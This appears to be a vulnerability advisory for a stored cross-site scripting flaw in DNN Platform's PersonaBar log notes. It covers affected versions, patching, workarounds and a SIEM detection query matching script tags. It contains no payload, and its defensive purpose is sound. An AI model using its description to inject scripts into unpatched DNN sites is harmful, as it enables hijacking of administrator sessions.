CVE-2026-24836
📋 TL;DR
This vulnerability allows stored cross-site scripting (XSS) attacks in DNN CMS. Attackers with extension permissions can inject malicious scripts into log notes that execute when administrators view the PersonaBar interface. Affects DNN installations from version 9.0.0 up to (but not including) 9.13.10 and 10.2.0.
💻 Affected Systems
- DNN Platform (formerly DotNetNuke)
📦 What is this software?
Dotnetnuke by Dnnsoftware
Dotnetnuke by Dnnsoftware
⚠️ Risk & Real-World Impact
Worst Case
Administrator account compromise leading to full CMS takeover, data theft, or website defacement through stored XSS payloads in administrative interface.
Likely Case
Session hijacking of administrator accounts, credential theft, or unauthorized administrative actions through client-side script execution.
If Mitigated
Limited impact if administrators use browsers with strong XSS protection or script blockers, though risk remains for unprotected sessions.
🎯 Exploit Status
Exploitation requires authenticated access with extension permissions. The vulnerability is in how rich text in log notes is rendered in the PersonaBar.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.13.10 or 10.2.0
Vendor Advisory: https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-2g5g-hcgh-q3rp
Restart Required: Yes
Instructions:
1. Backup your DNN installation and database. 2. Download version 9.13.10 or 10.2.0 from the official DNN repository. 3. Follow the DNN upgrade documentation for your version. 4. Restart the application pool in IIS. 5. Verify the PersonaBar displays log notes without script execution.
🔧 Temporary Workarounds
Disable PersonaBar access for non-essential users
allRestrict PersonaBar access to only essential administrators to reduce attack surface.
Configure role permissions in DNN to limit PersonaBar access
Implement Content Security Policy (CSP)
windowsAdd CSP headers to prevent script execution from untrusted sources in the PersonaBar.
Add CSP header via web.config or IIS settings
🧯 If You Can't Patch
- Implement strict input validation and sanitization for all rich text fields in extensions
- Monitor and audit log note entries for suspicious script-like content
🔍 How to Verify
Check if Vulnerable:
Check DNN version in Host Settings > Basic Settings. If version is between 9.0.0-9.13.9 or 10.0.0-10.1.x, the system is vulnerable.Check Version:
Check Host Settings in DNN admin interface or examine web.config for version informationVerify Fix Applied:
After patching, verify version shows 9.13.10 or 10.2.0. Test by creating a log note with script tags and confirm they are sanitized in PersonaBar.📡 Detection & Monitoring
Log Indicators:
- Unusual log note entries containing script tags or JavaScript code
- Multiple log entries from same extension in short time
Network Indicators:
- HTTP requests to PersonaBar with suspicious parameters
- Unexpected outbound connections from admin sessions
SIEM Query:
source="dnn_logs" AND (message="*<script>*" OR message="*javascript:*")